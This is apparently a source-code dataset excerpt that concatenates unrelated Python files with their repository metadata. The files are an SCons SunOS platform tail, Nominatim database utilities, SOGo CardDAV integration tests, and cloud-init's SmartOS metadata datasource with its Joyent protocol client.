env['PKGCHK'] = '/usr/sbin/pkgchk'
env['ENV']['PATH'] = env['ENV']['PATH'] + ':/opt/SUNWspro/bin:/usr/ccs/bin'
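# A minimal sketch of how this module is normally reached, as the docstring
# says: not imported directly but selected through SCons.Platform.Platform().
def _example_platform_selection():
    import SCons.Platform
    # 'sunos' requests this platform explicitly; Platform() with no argument
    # would autodetect the host instead.
    return SCons.Platform.Platform('sunos')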
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
|
xiaohaidao007/pandoraBox-SDK-mt7620
|
staging_dir/host/lib/scons-2.5.0/SCons/Platform/sunos.py
|
Python
|
gpl-2.0
| 1,912
|
"""
Helper functions for handling DB accesses.
"""
import subprocess
import logging
import gzip
import io
from nominatim.db.connection import get_pg_env
from nominatim.errors import UsageError
LOG = logging.getLogger()
def _pipe_to_proc(proc, fdesc):
chunk = fdesc.read(2048)
while chunk and proc.poll() is None:
try:
proc.stdin.write(chunk)
except BrokenPipeError as exc:
raise UsageError("Failed to execute SQL file.") from exc
chunk = fdesc.read(2048)
return len(chunk)
def execute_file(dsn, fname, ignore_errors=False, pre_code=None, post_code=None):
""" Read an SQL file and run its contents against the given database
using psql. Use `pre_code` and `post_code` to run extra commands
before or after executing the file. The commands are run within the
same session, so they may be used to wrap the file execution in a
transaction.
"""
cmd = ['psql']
if not ignore_errors:
cmd.extend(('-v', 'ON_ERROR_STOP=1'))
if not LOG.isEnabledFor(logging.INFO):
cmd.append('--quiet')
proc = subprocess.Popen(cmd, env=get_pg_env(dsn), stdin=subprocess.PIPE)
try:
if not LOG.isEnabledFor(logging.INFO):
proc.stdin.write('set client_min_messages to WARNING;'.encode('utf-8'))
if pre_code:
proc.stdin.write((pre_code + ';').encode('utf-8'))
if fname.suffix == '.gz':
with gzip.open(str(fname), 'rb') as fdesc:
remain = _pipe_to_proc(proc, fdesc)
else:
with fname.open('rb') as fdesc:
remain = _pipe_to_proc(proc, fdesc)
if remain == 0 and post_code:
proc.stdin.write((';' + post_code).encode('utf-8'))
finally:
proc.stdin.close()
ret = proc.wait()
if ret != 0 or remain > 0:
raise UsageError("Failed to execute SQL file.")
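# A minimal usage sketch of execute_file(): wrap the file in a transaction
# via pre_code/post_code as described in the docstring. The DSN and the path
# are illustrative placeholders.
def _execute_file_example():
    from pathlib import Path
    execute_file('dbname=nominatim', Path('data/country_name.sql'),
                 pre_code='BEGIN', post_code='COMMIT')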
# List of characters that need to be quoted for the copy command.
_SQL_TRANSLATION = {ord(u'\\'): u'\\\\',
ord(u'\t'): u'\\t',
ord(u'\n'): u'\\n'}
class CopyBuffer:
""" Data collector for the copy_from command.
"""
def __init__(self):
self.buffer = io.StringIO()
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
if self.buffer is not None:
self.buffer.close()
def add(self, *data):
""" Add another row of data to the copy buffer.
"""
first = True
for column in data:
if first:
first = False
else:
self.buffer.write('\t')
if column is None:
self.buffer.write('\\N')
else:
self.buffer.write(str(column).translate(_SQL_TRANSLATION))
self.buffer.write('\n')
def copy_out(self, cur, table, columns=None):
""" Copy all collected data into the given table.
"""
if self.buffer.tell() > 0:
self.buffer.seek(0)
cur.copy_from(self.buffer, table, columns=columns)
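# A minimal sketch of the intended CopyBuffer workflow, assuming an open
# psycopg2 cursor 'cur' and a table with matching columns: add() escapes
# tabs/newlines and turns None into \N, copy_out() streams the rows via COPY.
def _copy_buffer_example(cur):
    with CopyBuffer() as buf:
        buf.add(1, 'Main Street', None)
        buf.add(2, 'Broad\tWay', 'note with\nnewline')
        buf.copy_out(cur, 'example_table', columns=('id', 'name', 'comment'))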
|
lonvia/Nominatim
|
nominatim/db/utils.py
|
Python
|
gpl-2.0
| 3,126
|
#!/usr/bin/python
from config import hostname, port, username, password
import carddav
import sogotests
import unittest
import webdavlib
import time
class JsonDavEventTests(unittest.TestCase):
def setUp(self):
self._connect_as_user()
def _connect_as_user(self, newuser=username, newpassword=password):
self.dv = carddav.Carddav(newuser, newpassword)
def _create_new_event(self, path):
gid = self.dv.newguid(path)
event = {'startDate': "2015-12-25",
'startTime': "10:00",
'endDate': "2015-12-25",
'endTime': "23:00",
'isTransparent': 0,
'sendAppointmentNotifications': 0,
'summary': "Big party",
'alarm': {'action': 'display',
'quantity': 10,
'unit': "MINUTES",
'reference': "BEFORE",
'relation': "START",
'email': "sogo1@example.com"},
'organizer': {'name': u"Balthazar C\xe9sar",
'email': "sogo2@example.com"},
'c_name': gid,
'c_folder': path
}
return (event, path, gid)
def _get_dav_data(self, filename, user=username, passwd=password):
w = webdavlib.WebDAVClient(hostname, port, user, passwd)
query = webdavlib.HTTPGET("http://localhost/SOGo/dav/%s/Calendar/personal/%s" % (username, filename))
w.execute(query)
self.assertEquals(query.response['status'], 200)
return query.response['body'].split("\r\n")
def _get_dav_field(self, davdata, fieldname):
try:
data = [a.split(':')[1] for a in davdata if fieldname in a][0]
except IndexError:
data = ''
return data
def test_create_new_event(self):
path = 'Calendar/personal'
(event, folder, gid) = self._create_new_event(path)
#print "Saving Event to:", folder, gid
self.dv.save_event(event, folder, gid)
#- Get the event back with JSON
self._connect_as_user()
self.dv.load_events()
elist = [e for e in self.dv.events if e['c_name'] == gid]
#- MUST have this event -- only once
self.assertEquals(len(elist), 1)
strdate = "%d-%.02d-%.02d" % time.gmtime(elist[0]['c_startdate'])[0:3]
self.assertEquals(strdate, event['startDate'])
#- Get the event back with DAV
dav = self._get_dav_data(gid, username, password)
self.assertEquals(self._get_dav_field(dav, 'SUMMARY:'), event['summary'])
class JsonDavPhoneTests(unittest.TestCase):
def setUp(self):
self._connect_as_user()
self.newphone = [{'type': 'home', 'value': '123.456.7890'}]
self.newphones_difftype = [{'type': 'home', 'value': '123.456.7890'},
{'type': 'work', 'value': '987.654.3210'},
{'type': 'fax', 'value': '555.666.7777'}]
self.newphones_sametype = [{'type': 'work', 'value': '123.456.7890'},
{'type': 'work', 'value': '987.654.3210'}]
# Easier to erase them all in tearDown
self.allphones = list(self.newphone)
self.allphones.extend(self.newphones_difftype)
self.allphones.extend(self.newphones_sametype)
#- In case there are no cards for this user
try:
self._get_card()
except IndexError:
path = 'Contacts/personal'
(card, path, gid) = self._create_new_card(path)
self._save_card(card)
def tearDown(self):
self._connect_as_user()
self._get_card()
#- Remove the phones we just added
for phone in self.allphones:
try:
self.card['phones'].pop(self.card['phones'].index(phone))
except ValueError:
#print "Can't find", phone
pass
self._save_card()
def _connect_as_user(self, newuser=username, newpassword=password):
self.dv = carddav.Carddav(newuser, newpassword)
def _create_new_card(self, path):
gid = self.dv.newguid(path)
card = {'c_categories': None,
'c_cn': 'John Doe',
'c_component': 'vcard',
'c_givenname': 'John Doe',
'c_mail': 'johndoe@nothere.com',
'c_name': gid,
'c_o': '',
'c_screenname': '',
'c_sn': '',
'c_telephonenumber': '123.456.7890',
'emails': [{'type': 'pref', 'value': 'johndoe@nothere.com'}],
'phones': [{'type': 'home', 'value': '111.222.3333'}],
'id': gid}
return (card, path, gid)
def _get_card(self, name="John Doe"):
tmp_card = self.dv.get_cards(name)[0]
self.card = self.dv.get_card(tmp_card['c_name'])
def _save_card(self, card=None):
if card:
self.dv.save_card(card)
else:
self.dv.save_card(self.card)
def _get_dav_data(self, filename, user=username, passwd=password):
w = webdavlib.WebDAVClient(hostname, port, user, passwd)
query = webdavlib.HTTPGET("http://localhost/SOGo/dav/%s/Contacts/personal/%s" % (username, filename))
w.execute(query)
self.assertEquals(query.response['status'], 200)
return query.response['body'].split("\r\n")
def _phone_to_dav_str(self, phonedict):
return "TEL;TYPE=%s:%s" % (phonedict['type'], phonedict['value'])
def _testMultiplePhones(self, phones):
""" Add Multiple Phones to Contact JSON and verify with DAV """
#- Use JSON to get CARD and add a phone and save it back
self._get_card()
oldphones = self.card['phones']
oldphones.extend(phones)
self._save_card()
#- Make sure that the phone is there when using JSON
self._connect_as_user()
self._get_card()
#print "C:::", self.card
testphones = self.card['phones']
#print "P1:", oldphones
#print "P2:", testphones
self.assertEquals(sorted(oldphones), sorted(testphones))
#- Verify that DAV has the same values
dav = self._get_dav_data(self.card['id'], username, password)
for phone in phones:
found = dav.index(self._phone_to_dav_str(phone))
self.assertTrue(found > 0)
def testSinglePhone(self):
self._testMultiplePhones(self.newphone)
def testMultipleDifferentPhones(self):
self._testMultiplePhones(self.newphones_difftype)
def testMultipleSameTypePhones(self):
self._testMultiplePhones(self.newphones_sametype)
if __name__ == "__main__":
sogotests.runTests()
|
saydulk/sogo
|
Tests/Integration/test-carddav.py
|
Python
|
gpl-2.0
| 6,859
|
# vi: ts=4 expandtab
#
# Copyright (C) 2013 Canonical Ltd.
#
# Author: Ben Howard <ben.howard@canonical.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 3, as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
#
# Datasource for provisioning on SmartOS. This works on Joyent
# and public/private Clouds using SmartOS.
#
# SmartOS hosts use a serial console (/dev/ttyS1) on KVM Linux Guests
# The meta-data is transmitted via key/value pairs made by
# requests on the console. For example, to get the hostname, you
# would send "GET hostname" on /dev/ttyS1.
# For Linux Guests running in LX-Brand Zones on SmartOS hosts
# a socket (/native/.zonecontrol/metadata.sock) is used instead
# of a serial console.
#
# Certain behavior is defined by the DataDictionary
# http://us-east.manta.joyent.com/jmc/public/mdata/datadict.html
# Comments with "@datadictionary" are snippets of the definition
import base64
import binascii
import json
import os
import random
import re
import socket
from cloudinit import log as logging
from cloudinit import serial
from cloudinit import sources
from cloudinit import util
LOG = logging.getLogger(__name__)
SMARTOS_ATTRIB_MAP = {
# Cloud-init Key : (SmartOS Key, Strip line endings)
'instance-id': ('sdc:uuid', True),
'local-hostname': ('hostname', True),
'public-keys': ('root_authorized_keys', True),
'user-script': ('user-script', False),
'legacy-user-data': ('user-data', False),
'user-data': ('cloud-init:user-data', False),
'iptables_disable': ('iptables_disable', True),
'motd_sys_info': ('motd_sys_info', True),
'availability_zone': ('sdc:datacenter_name', True),
'vendor-data': ('sdc:vendor-data', False),
'operator-script': ('sdc:operator-script', False),
'hostname': ('sdc:hostname', True),
'dns_domain': ('sdc:dns_domain', True),
}
SMARTOS_ATTRIB_JSON = {
# Cloud-init Key : (SmartOS Key known JSON)
'network-data': 'sdc:nics',
'dns_servers': 'sdc:resolvers',
'routes': 'sdc:routes',
}
SMARTOS_ENV_LX_BRAND = "lx-brand"
SMARTOS_ENV_KVM = "kvm"
DS_NAME = 'SmartOS'
DS_CFG_PATH = ['datasource', DS_NAME]
NO_BASE64_DECODE = [
'iptables_disable',
'motd_sys_info',
'root_authorized_keys',
'sdc:datacenter_name',
    'sdc:uuid',
'user-data',
'user-script',
]
METADATA_SOCKFILE = '/native/.zonecontrol/metadata.sock'
SERIAL_DEVICE = '/dev/ttyS1'
SERIAL_TIMEOUT = 60
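# A minimal sketch of the console exchange described in the header comment
# (KVM guests answer "GET <key>" on the serial device). The datasource itself
# goes through jmc_client_factory() below rather than this naive helper,
# which ignores the real client's framing and error handling.
def _console_get_sketch(key):
    console = serial.Serial(SERIAL_DEVICE, timeout=SERIAL_TIMEOUT)
    try:
        console.write(('GET %s\n' % key).encode('ascii'))
        return console.readline().strip()
    finally:
        console.close()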
# BUILT-IN DATASOURCE CONFIGURATION
# The following is the built-in configuration. If the values
# are not set via the system configuration, then these defaults
# will be used:
# serial_device: which serial device to use for the meta-data
# serial_timeout: how long to wait on the device
# no_base64_decode: values which are not base64 encoded and
# are fetched directly from SmartOS, not meta-data values
# base64_keys: meta-data keys that are delivered in base64
# base64_all: with the exclusion of no_base64_decode values,
# treat all meta-data as base64 encoded
# disk_setup: describes how to partition the ephemeral drive
# fs_setup: describes how to format the ephemeral drive
#
BUILTIN_DS_CONFIG = {
'serial_device': SERIAL_DEVICE,
'serial_timeout': SERIAL_TIMEOUT,
'metadata_sockfile': METADATA_SOCKFILE,
'no_base64_decode': NO_BASE64_DECODE,
'base64_keys': [],
'base64_all': False,
'disk_aliases': {'ephemeral0': '/dev/vdb'},
}
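# A minimal sketch of overriding the defaults above through the system
# configuration; the nesting mirrors DS_CFG_PATH = ['datasource', 'SmartOS']
# and is merged in DataSourceSmartOS.__init__ via util.get_cfg_by_path().
# The values shown are placeholders.
_EXAMPLE_SYS_CFG_OVERRIDE = {
    'datasource': {
        'SmartOS': {
            'serial_timeout': 120,
            'base64_all': True,
        },
    },
}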
BUILTIN_CLOUD_CONFIG = {
'disk_setup': {
'ephemeral0': {'table_type': 'mbr',
'layout': False,
'overwrite': False}
},
'fs_setup': [{'label': 'ephemeral0',
'filesystem': 'ext3',
'device': 'ephemeral0'}],
}
# builtin vendor-data is a boothook that writes a script into
# /var/lib/cloud/scripts/per-boot. *That* script then handles
# executing the 'operator-script' and 'user-script' files
# that cloud-init writes into /var/lib/cloud/instance/data/
# if they exist.
#
# This is all very indirect, but it's done like this so that at
# some point in the future cloud-init might not do it at all; instead,
# the vendor would actually provide vendor-data that accomplishes
# their goals. (That is the point of vendor-data.)
#
# cloud-init does cheat a bit and writes the operator-script and user-script
# itself. It could have the vendor-script do that, but it seems better
# not to require the image to contain a tool (mdata-get) to read those
# keys when we have a perfectly good one inside cloud-init.
BUILTIN_VENDOR_DATA = """\
#cloud-boothook
#!/bin/sh
fname="%(per_boot_d)s/01_smartos_vendor_data.sh"
mkdir -p "${fname%%/*}"
cat > "$fname" <<"END_SCRIPT"
#!/bin/sh
##
# This file is written as part of the default vendor data for SmartOS.
# The SmartOS datasource writes the listed file from the listed metadata key
# sdc:operator-script -> %(operator_script)s
# user-script -> %(user_script)s
#
# You can view content with 'mdata-get <key>'
#
for script in "%(operator_script)s" "%(user_script)s"; do
[ -x "$script" ] || continue
echo "executing '$script'" 1>&2
"$script"
done
END_SCRIPT
chmod +x "$fname"
"""
# @datadictionary: this is the legacy path for placing files from metadata
# per the SmartOS location. It is not preferable, but is kept for
# legacy reasons.
LEGACY_USER_D = "/var/db"
class DataSourceSmartOS(sources.DataSource):
_unset = "_unset"
smartos_type = _unset
md_client = _unset
def __init__(self, sys_cfg, distro, paths):
sources.DataSource.__init__(self, sys_cfg, distro, paths)
self.ds_cfg = util.mergemanydict([
self.ds_cfg,
util.get_cfg_by_path(sys_cfg, DS_CFG_PATH, {}),
BUILTIN_DS_CONFIG])
self.metadata = {}
self.network_data = None
self._network_config = None
self.script_base_d = os.path.join(self.paths.get_cpath("scripts"))
self._init()
def __str__(self):
root = sources.DataSource.__str__(self)
return "%s [client=%s]" % (root, self.md_client)
def _init(self):
if self.smartos_type == self._unset:
self.smartos_type = get_smartos_environ()
if self.smartos_type is None:
self.md_client = None
if self.md_client == self._unset:
self.md_client = jmc_client_factory(
smartos_type=self.smartos_type,
metadata_sockfile=self.ds_cfg['metadata_sockfile'],
serial_device=self.ds_cfg['serial_device'],
serial_timeout=self.ds_cfg['serial_timeout'])
def _set_provisioned(self):
'''Mark the instance provisioning state as successful.
When run in a zone, the host OS will look for /var/svc/provisioning
to be renamed as /var/svc/provision_success. This should be done
after meta-data is successfully retrieved and from this point
the host considers the provision of the zone to be a success and
keeps the zone running.
'''
LOG.debug('Instance provisioning state set as successful')
svc_path = '/var/svc'
if os.path.exists('/'.join([svc_path, 'provisioning'])):
os.rename('/'.join([svc_path, 'provisioning']),
'/'.join([svc_path, 'provision_success']))
def get_data(self):
self._init()
md = {}
ud = ""
if not self.smartos_type:
LOG.debug("Not running on smartos")
return False
if not self.md_client.exists():
LOG.debug("No metadata device '%r' found for SmartOS datasource",
self.md_client)
return False
for ci_noun, attribute in SMARTOS_ATTRIB_MAP.items():
smartos_noun, strip = attribute
md[ci_noun] = self.md_client.get(smartos_noun, strip=strip)
for ci_noun, smartos_noun in SMARTOS_ATTRIB_JSON.items():
md[ci_noun] = self.md_client.get_json(smartos_noun)
# @datadictionary: This key may contain a program that is written
# to a file in the filesystem of the guest on each boot and then
# executed. It may be of any format that would be considered
# executable in the guest instance.
#
# We write 'user-script' and 'operator-script' into the
# instance/data directory. The default vendor-data then handles
# executing them later.
data_d = os.path.join(self.paths.get_cpath(), 'instances',
md['instance-id'], 'data')
user_script = os.path.join(data_d, 'user-script')
u_script_l = "%s/user-script" % LEGACY_USER_D
write_boot_content(md.get('user-script'), content_f=user_script,
link=u_script_l, shebang=True, mode=0o700)
operator_script = os.path.join(data_d, 'operator-script')
write_boot_content(md.get('operator-script'),
content_f=operator_script, shebang=False,
mode=0o700)
# @datadictionary: This key has no defined format, but its value
# is written to the file /var/db/mdata-user-data on each boot prior
# to the phase that runs user-script. This file is not to be executed.
# This allows a configuration file of some kind to be injected into
# the machine to be consumed by the user-script when it runs.
u_data = md.get('legacy-user-data')
u_data_f = "%s/mdata-user-data" % LEGACY_USER_D
write_boot_content(u_data, u_data_f)
# Handle the cloud-init regular meta
if not md['local-hostname']:
md['local-hostname'] = md['instance-id']
ud = None
if md['user-data']:
ud = md['user-data']
if not md['vendor-data']:
md['vendor-data'] = BUILTIN_VENDOR_DATA % {
'user_script': user_script,
'operator_script': operator_script,
'per_boot_d': os.path.join(self.paths.get_cpath("scripts"),
'per-boot'),
}
self.metadata = util.mergemanydict([md, self.metadata])
self.userdata_raw = ud
self.vendordata_raw = md['vendor-data']
self.network_data = md['network-data']
self._set_provisioned()
return True
def device_name_to_device(self, name):
return self.ds_cfg['disk_aliases'].get(name)
def get_config_obj(self):
if self.smartos_type == SMARTOS_ENV_KVM:
return BUILTIN_CLOUD_CONFIG
return {}
def get_instance_id(self):
return self.metadata['instance-id']
@property
def network_config(self):
if self._network_config is None:
if self.network_data is not None:
self._network_config = (
convert_smartos_network_data(
network_data=self.network_data,
dns_servers=self.metadata['dns_servers'],
dns_domain=self.metadata['dns_domain']))
return self._network_config
class JoyentMetadataFetchException(Exception):
pass
class JoyentMetadataClient(object):
"""
A client implementing v2 of the Joyent Metadata Protocol Specification.
The full specification can be found at
http://eng.joyent.com/mdata/protocol.html
"""
line_regex = re.compile(
r'V2 (?P<length>\d+) (?P<checksum>[0-9a-f]+)'
r' (?P<body>(?P<request_id>[0-9a-f]+) (?P<status>SUCCESS|NOTFOUND)'
r'( (?P<payload>.+))?)')
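# For illustration only (hypothetical values, not taken from the spec):
# a GET request and its reply on the wire look roughly like
#   V2 25 <crc32-of-body> 0123abcd GET c2RjOnV1aWQ=\n
#   V2 <len> <crc32-of-body> 0123abcd SUCCESS <base64-payload>\n
# where 25 is len("0123abcd GET c2RjOnV1aWQ="), the checksum is the CRC32
# of the body rendered as 8 lowercase hex digits, and "c2RjOnV1aWQ=" is
# base64("sdc:uuid"). The line_regex above parses the reply frame.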
def __init__(self, smartos_type=None, fp=None):
if smartos_type is None:
smartos_type = get_smartos_environ()
self.smartos_type = smartos_type
self.fp = fp
def _checksum(self, body):
return '{0:08x}'.format(
binascii.crc32(body.encode('utf-8')) & 0xffffffff)
def _get_value_from_frame(self, expected_request_id, frame):
frame_data = self.line_regex.match(frame).groupdict()
if int(frame_data['length']) != len(frame_data['body']):
raise JoyentMetadataFetchException(
'Incorrect frame length given ({0} != {1}).'.format(
frame_data['length'], len(frame_data['body'])))
expected_checksum = self._checksum(frame_data['body'])
if frame_data['checksum'] != expected_checksum:
raise JoyentMetadataFetchException(
'Invalid checksum (expected: {0}; got {1}).'.format(
expected_checksum, frame_data['checksum']))
if frame_data['request_id'] != expected_request_id:
raise JoyentMetadataFetchException(
'Request ID mismatch (expected: {0}; got {1}).'.format(
expected_request_id, frame_data['request_id']))
if not frame_data.get('payload', None):
LOG.debug('No value found.')
return None
value = util.b64d(frame_data['payload'])
LOG.debug('Value "%s" found.', value)
return value
def request(self, rtype, param=None):
request_id = '{0:08x}'.format(random.randint(0, 0xffffffff))
message_body = ' '.join((request_id, rtype,))
if param:
message_body += ' ' + base64.b64encode(param.encode()).decode()
msg = 'V2 {0} {1} {2}\n'.format(
len(message_body), self._checksum(message_body), message_body)
LOG.debug('Writing "%s" to metadata transport.', msg)
need_close = False
if not self.fp:
self.open_transport()
need_close = True
self.fp.write(msg.encode('ascii'))
self.fp.flush()
response = bytearray()
response.extend(self.fp.read(1))
while response[-1:] != b'\n':
response.extend(self.fp.read(1))
if need_close:
self.close_transport()
response = response.rstrip().decode('ascii')
LOG.debug('Read "%s" from metadata transport.', response)
if 'SUCCESS' not in response:
return None
value = self._get_value_from_frame(request_id, response)
return value
def get(self, key, default=None, strip=False):
result = self.request(rtype='GET', param=key)
if result is None:
return default
if result and strip:
result = result.strip()
return result
def get_json(self, key, default=None):
result = self.get(key, default=default)
if result is None:
return default
return json.loads(result)
def list(self):
result = self.request(rtype='KEYS')
if result:
result = result.split('\n')
return result
def put(self, key, val):
param = b' '.join([base64.b64encode(i.encode())
for i in (key, val)]).decode()
return self.request(rtype='PUT', param=param)
def delete(self, key):
return self.request(rtype='DELETE', param=key)
def close_transport(self):
if self.fp:
self.fp.close()
self.fp = None
def __enter__(self):
if self.fp:
return self
self.open_transport()
return self
def __exit__(self, exc_type, exc_value, traceback):
self.close_transport()
return
def open_transport(self):
raise NotImplementedError
class JoyentMetadataSocketClient(JoyentMetadataClient):
def __init__(self, socketpath, smartos_type=SMARTOS_ENV_LX_BRAND):
super(JoyentMetadataSocketClient, self).__init__(smartos_type)
self.socketpath = socketpath
def open_transport(self):
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
sock.connect(self.socketpath)
self.fp = sock.makefile('rwb')
def exists(self):
return os.path.exists(self.socketpath)
def __repr__(self):
return "%s(socketpath=%s)" % (self.__class__.__name__, self.socketpath)
class JoyentMetadataSerialClient(JoyentMetadataClient):
def __init__(self, device, timeout=10, smartos_type=SMARTOS_ENV_KVM):
super(JoyentMetadataSerialClient, self).__init__(smartos_type)
self.device = device
self.timeout = timeout
def exists(self):
return os.path.exists(self.device)
def open_transport(self):
ser = serial.Serial(self.device, timeout=self.timeout)
if not ser.isOpen():
raise SystemError("Unable to open %s" % self.device)
self.fp = ser
def __repr__(self):
return "%s(device=%s, timeout=%s)" % (
self.__class__.__name__, self.device, self.timeout)
class JoyentMetadataLegacySerialClient(JoyentMetadataSerialClient):
"""V1 of the protocol was not safe for all values.
Thus, we allowed the user to pass values in as base64 encoded.
Users may still reasonably expect to be able to send base64 data
and have it transparently decoded. So even though the V2 format is
now used, and is safe (using base64 itself), we keep legacy support.
The way for a user to do this was:
a.) specify 'base64_keys' key whose value is a comma delimited
list of keys that were base64 encoded.
b.) base64_all: string interpreted as a boolean that indicates
if all keys are base64 encoded.
c.) set a key named b64-<keyname> with a boolean indicating that
<keyname> is base64 encoded."""
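# A hypothetical example of (a): if the metadata contains
#   base64_keys = "foo,bar"      and      foo = "aGVsbG8="
# then get("foo") below returns the decoded string "hello" (assuming "foo"
# is not listed in NO_BASE64_DECODE). This is only an illustration of the
# rules in the docstring, not data from a real SmartOS host.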
def __init__(self, device, timeout=10, smartos_type=None):
s = super(JoyentMetadataLegacySerialClient, self)
s.__init__(device, timeout, smartos_type)
self.base64_keys = None
self.base64_all = None
def _init_base64_keys(self, reset=False):
if reset:
self.base64_keys = None
self.base64_all = None
keys = None
if self.base64_all is None:
keys = self.list()
if 'base64_all' in keys:
self.base64_all = util.is_true(self._get("base64_all"))
else:
self.base64_all = False
if self.base64_all:
# short circuit if base64_all is true
return
if self.base64_keys is None:
if keys is None:
keys = self.list()
b64_keys = set()
if 'base64_keys' in keys:
b64_keys = set(self._get("base64_keys").split(","))
# now add any b64-<keyname> that has a true value
for key in [k[3:] for k in keys if k.startswith("b64-")]:
if util.is_true(self._get(key)):
b64_keys.add(key)
else:
if key in b64_keys:
b64_keys.remove(key)
self.base64_keys = b64_keys
def _get(self, key, default=None, strip=False):
return (super(JoyentMetadataLegacySerialClient, self).
get(key, default=default, strip=strip))
def is_b64_encoded(self, key, reset=False):
if key in NO_BASE64_DECODE:
return False
self._init_base64_keys(reset=reset)
if self.base64_all:
return True
return key in self.base64_keys
def get(self, key, default=None, strip=False):
mdefault = object()
val = self._get(key, strip=False, default=mdefault)
if val is mdefault:
return default
if self.is_b64_encoded(key):
try:
val = base64.b64decode(val.encode()).decode()
# Bogus input produces different errors in Python 2 and 3
except (TypeError, binascii.Error):
LOG.warn("Failed base64 decoding key '%s': %s", key, val)
if strip:
val = val.strip()
return val
def jmc_client_factory(
smartos_type=None, metadata_sockfile=METADATA_SOCKFILE,
serial_device=SERIAL_DEVICE, serial_timeout=SERIAL_TIMEOUT,
uname_version=None):
if smartos_type is None:
smartos_type = get_smartos_environ(uname_version)
if smartos_type is None:
return None
elif smartos_type == SMARTOS_ENV_KVM:
return JoyentMetadataLegacySerialClient(
device=serial_device, timeout=serial_timeout,
smartos_type=smartos_type)
elif smartos_type == SMARTOS_ENV_LX_BRAND:
return JoyentMetadataSocketClient(socketpath=metadata_sockfile,
smartos_type=smartos_type)
raise ValueError("Unknown value for smartos_type: %s" % smartos_type)
def write_boot_content(content, content_f, link=None, shebang=False,
mode=0o400):
"""
Write the content to content_f, under the following rules:
1. If no content, remove the file
2. Write the content
3. If executable and no file magic, add it
4. If there is a link, create it
@param content: what to write
@param content_f: the file name
@param link: if defined, location to create a symlink to
@param shebang: if no file magic, set shebang
@param mode: file mode
Because of the way that cloud-init executes scripts (no shell),
a script will fail to execute if it does not have a shebang (magic
bit) set in the file. If shebang=True, the script is checked for a
shebang and, if one is missing, the SmartOS default of bash is assumed.
"""
if not content and os.path.exists(content_f):
os.unlink(content_f)
if link and os.path.islink(link):
os.unlink(link)
if not content:
return
util.write_file(content_f, content, mode=mode)
if shebang and not content.startswith("#!"):
try:
cmd = ["file", "--brief", "--mime-type", content_f]
(f_type, _err) = util.subp(cmd)
LOG.debug("script %s mime type is %s", content_f, f_type)
if f_type.strip() == "text/plain":
new_content = "\n".join(["#!/bin/bash", content])
util.write_file(content_f, new_content, mode=mode)
LOG.debug("added shebang to file %s", content_f)
except Exception as e:
util.logexc(LOG, ("Failed to identify script type for %s" %
content_f, e))
if link:
try:
if os.path.islink(link):
os.unlink(link)
if content and os.path.exists(content_f):
util.ensure_dir(os.path.dirname(link))
os.symlink(content_f, link)
except IOError as e:
util.logexc(LOG, "failed establishing content link: %s", e)
def get_smartos_environ(uname_version=None, product_name=None):
uname = os.uname()
# SDC LX-Brand Zones lack dmidecode (no /dev/mem) but
# report 'BrandZ virtual linux' as the kernel version
if uname_version is None:
uname_version = uname[3]
if uname_version.lower() == 'brandz virtual linux':
return SMARTOS_ENV_LX_BRAND
if product_name is None:
system_type = util.read_dmi_data("system-product-name")
else:
system_type = product_name
if system_type and 'smartdc' in system_type.lower():
return SMARTOS_ENV_KVM
return None
# Convert SMARTOS 'sdc:nics' data to network_config yaml
def convert_smartos_network_data(network_data=None,
dns_servers=None, dns_domain=None):
"""Return a dictionary of network_config by parsing provided
SMARTOS sdc:nics configuration data
sdc:nics data is a list of dictionaries, each describing the
properties of a nic and the ip configuration desired for it.
Converting the format is straightforward though it does include
duplicate information as well as data which appears to be relevant
to the host OS rather than the guest.
For each entry in the nics list returned from query sdc:nics, we
create a type: physical entry, and extract the interface properties:
'mac' -> 'mac_address', 'mtu', 'interface' -> 'name'. The remaining
keys are related to ip configuration. For each ip in the 'ips' list
we create a subnet entry under 'subnets', pairing the ip to one in
the 'gateways' list.
"""
valid_keys = {
'physical': [
'mac_address',
'mtu',
'name',
'params',
'subnets',
'type',
],
'subnet': [
'address',
'broadcast',
'dns_nameservers',
'dns_search',
'metric',
'pointopoint',
'routes',
'scope',
'type',
],
}
if dns_servers:
if not isinstance(dns_servers, (list, tuple)):
dns_servers = [dns_servers]
else:
dns_servers = []
if dns_domain:
if not isinstance(dns_domain, (list, tuple)):
dns_domain = [dns_domain]
else:
dns_domain = []
def is_valid_ipv4(addr):
return '.' in addr
def is_valid_ipv6(addr):
return ':' in addr
pgws = {
'ipv4': {'match': is_valid_ipv4, 'gw': None},
'ipv6': {'match': is_valid_ipv6, 'gw': None},
}
config = []
for nic in network_data:
cfg = dict((k, v) for k, v in nic.items()
if k in valid_keys['physical'])
cfg.update({
'type': 'physical',
'name': nic['interface']})
if 'mac' in nic:
cfg.update({'mac_address': nic['mac']})
subnets = []
for ip in nic.get('ips', []):
if ip == "dhcp":
subnet = {'type': 'dhcp4'}
else:
subnet = dict((k, v) for k, v in nic.items()
if k in valid_keys['subnet'])
subnet.update({
'type': 'static',
'address': ip,
})
proto = 'ipv4' if is_valid_ipv4(ip) else 'ipv6'
# Only use gateways for 'primary' nics
if 'primary' in nic and nic.get('primary', False):
# the ips and gateways list may be N to M, here
# we map the ip index into the gateways list,
# and handle the case that we could have more ips
# than gateways. we only consume the first gateway
if not pgws[proto]['gw']:
gateways = [gw for gw in nic.get('gateways', [])
if pgws[proto]['match'](gw)]
if len(gateways):
pgws[proto]['gw'] = gateways[0]
subnet.update({'gateway': pgws[proto]['gw']})
subnets.append(subnet)
cfg.update({'subnets': subnets})
config.append(cfg)
if dns_servers:
config.append(
{'type': 'nameserver', 'address': dns_servers,
'search': dns_domain})
return {'version': 1, 'config': config}
# Used to match classes to dependencies
datasources = [
(DataSourceSmartOS, (sources.DEP_FILESYSTEM, )),
]
# Return a list of data sources that match this set of dependencies
def get_datasource_list(depends):
return sources.list_from_depends(depends, datasources)
if __name__ == "__main__":
import sys
jmc = jmc_client_factory()
if jmc is None:
print("Do not appear to be on smartos.")
sys.exit(1)
if len(sys.argv) == 1:
keys = (list(SMARTOS_ATTRIB_JSON.keys()) +
